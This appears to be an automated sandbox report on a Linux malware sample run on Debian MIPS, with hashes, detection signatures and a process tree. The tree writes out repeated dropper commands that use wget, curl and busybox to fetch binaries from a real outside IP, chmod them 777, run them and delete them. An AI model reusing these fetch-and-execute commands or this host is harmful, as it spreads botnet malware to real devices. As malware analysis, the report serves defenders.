Analysis
-
max time kernel
147s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 832 chmod 855 chmod 891 chmod 819 chmod 807 chmod 867 chmod 885 chmod 903 chmod 738 chmod 782 chmod 909 chmod 915 chmod 744 chmod 759 chmod 813 chmod 873 chmod 879 chmod 897 chmod 922 chmod 928 chmod 731 chmod -
Executes dropped EXE 21 IoCs
Processes:
8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKeFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuoFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9HkgBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0aymJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuwwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twmJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuweFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXioc pid process /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 732 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 739 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 745 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 760 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 783 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 808 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 814 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 820 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 834 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 856 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 868 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 874 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 880 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 886 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 892 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 898 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 904 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 910 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 916 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 923 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 929 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:698
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:707
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:729
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:731 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:732 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:733
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:734
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:737
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:739 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:740
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:741
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:743
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:744 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:745 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:746
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:747
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:748 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:755
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:759 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:760 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:763
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:765
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:778
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:782 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:783 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:786
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:787
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:805
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:807 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:808 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:809
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:810
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:812
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:813 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:814 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:815
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:816
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:818
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:819 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:820 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:821
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:822
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:828
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:832 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:834 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:837
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:838
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:852
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:855 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:856 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:859
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:860
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:866
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:867 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:868 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:869
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:870
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:872
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:873 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:874 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:875
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:876
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:878
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:879 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:880 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:881
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:882
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:884
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:887
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:888
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:890
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:891 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:892 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:893
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:894
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:896
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:897 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:898 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:899
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:900
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:902
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:903 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:904 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:905
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:906
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:908
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:909 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:910 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:911
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:912
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:914
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:915 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:916 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:917
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:918
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:921
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:922 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:923 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:924
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:925
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:927
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:928 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:929 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:930
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97